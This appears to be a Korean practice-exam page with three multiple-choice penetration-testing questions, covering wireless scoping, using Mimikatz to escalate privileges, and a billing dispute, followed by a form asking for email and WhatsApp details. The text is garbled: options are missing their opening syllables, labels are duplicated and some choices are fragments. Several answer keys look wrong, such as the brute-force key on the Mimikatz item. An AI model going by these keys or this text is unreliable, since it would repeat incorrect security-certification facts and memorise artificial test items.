클라이언트가 무선 침투 테스트를 예약했습니다. 다음 중 테스트를 시작하기 전에 가장 필요한 범위 지정 대상 정보를 설명하는 것은 무엇인가요?
A. 테스트할 물리적 위치 및 네트워크 ESSID
B. 라이언트가 소유한 무선 장치 수
C. 라이언트가 선호하는 무선 액세스 포인트 공급업체
D. 라이언트 디바이스에서 사용하는 대역 및 주파수
답변 보기
정답: D
질문 #66
모의 침투 테스터인 조는 기본 계정 자격 증명을 받고 Windows 시스템에 로그인했습니다. 조는 자신의 권한을 상승시키기 위해 다음 중 어느 곳에서 미미카츠를 사용하여 자격 증명을 가져왔을까요?
A. 용자 및 그룹 열거를 위한
A. ID 사이클링
B. 자격 증명 전달을 위한 해시 전달
C. 스트에 로그인하기 위한 비밀번호 무차별 대입
D. 스템 계정을 사칭하는 D
답변 보기
정답: C
질문 #67
한 기업의 보안 평가를 수행한 후, 고객의 테스트 환경을 사용할 수 없었던 시간에 대한 비용이 청구된 것을 발견했습니다. 고객은 부당하게 청구되었다고 주장합니다. 다음 중 이러한 상황에서 지침을 제공할 수 있는 문서로 가장 적합한 것은 무엇인가요?
A. 가 요금
B. 사 정책
C. 충격성
D. 업 유형
답변 보기
정답: D

제출 후 답변 보기

질문에 대한 답변을 얻으려면 이메일과 WhatsApp을 제출하세요.

참고: 올바른 시험 결과를 얻을 수 있도록 이메일 ID와 Whatsapp이 유효한지 확인하십시오.

이메일:
WhatsApp/전화번호: